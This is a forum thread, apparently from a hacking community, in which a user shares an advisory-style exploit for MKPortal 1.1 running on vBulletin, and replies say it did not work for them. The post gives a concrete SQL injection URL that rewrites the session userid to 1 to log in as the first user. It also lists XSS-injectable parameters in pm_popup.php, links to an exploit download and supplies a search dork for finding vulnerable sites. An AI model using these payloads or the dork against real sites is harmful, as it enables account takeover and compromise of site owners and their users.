Jump to content
Bigojey

vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection

Recommended Posts

Posted

i got this exploit from a friend. his name is Mustafa Can Bjorn but everybody knows him as nukedx :)

ps: i dont know if this exploit was given before so dont be angry pls if you already know this exploit :)

here's the exploit :

Vendor: MKPortal (http://www.mkportal.it/)

Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)

About: Via this methods remote attacker can inject arbitrary SQL queries to

ind parameter in index.php of MKPortal.

Vulnerable code can be found in the file

mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it

easy to

by pass this SQL update function.

Also there is cross-site scripting vulnerability in pm_popup.php the

parameters u1,m1,m2,m3,m4 did not sanitized properly.

Level: Critical

---

How&Example:

SQL Injection :

GET -> http://[victim]/[mkportaldir]/index.php?ind=

EXAMPLE -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1

So with this example remote attacker updates his session's userid to 1 and

after refreshing the page he can logs as userid 1.

XSS:

GET ->

[url]http://[victim]/[/url][mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]

---

Timeline:

* 21/04/2006: Vulnerability found.

* 21/04/2006: Contacted with vendor and waiting reply.

---

Exploit:

http://www.nukedx.com/?getxpl=26

---

Dorks: "MKPortal 1.1 RC1"

---

Original advisory can be found at: http://www.nukedx.com/?viewdoc=26

Posted

mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers

-----------------------

fuck, u are not a romanian boy :D , i say this:

i`ve try this exploit but no work for me

Posted

<div class='quotetop'>QUOTE("Xavier")</div>

mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers

-----------------------

fuck, u are not a romanian boy  :D , i say this:

i`ve try this exploit but no work for me

:) pls in english german or espanol :)

i hope it isnt such negativsentence

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...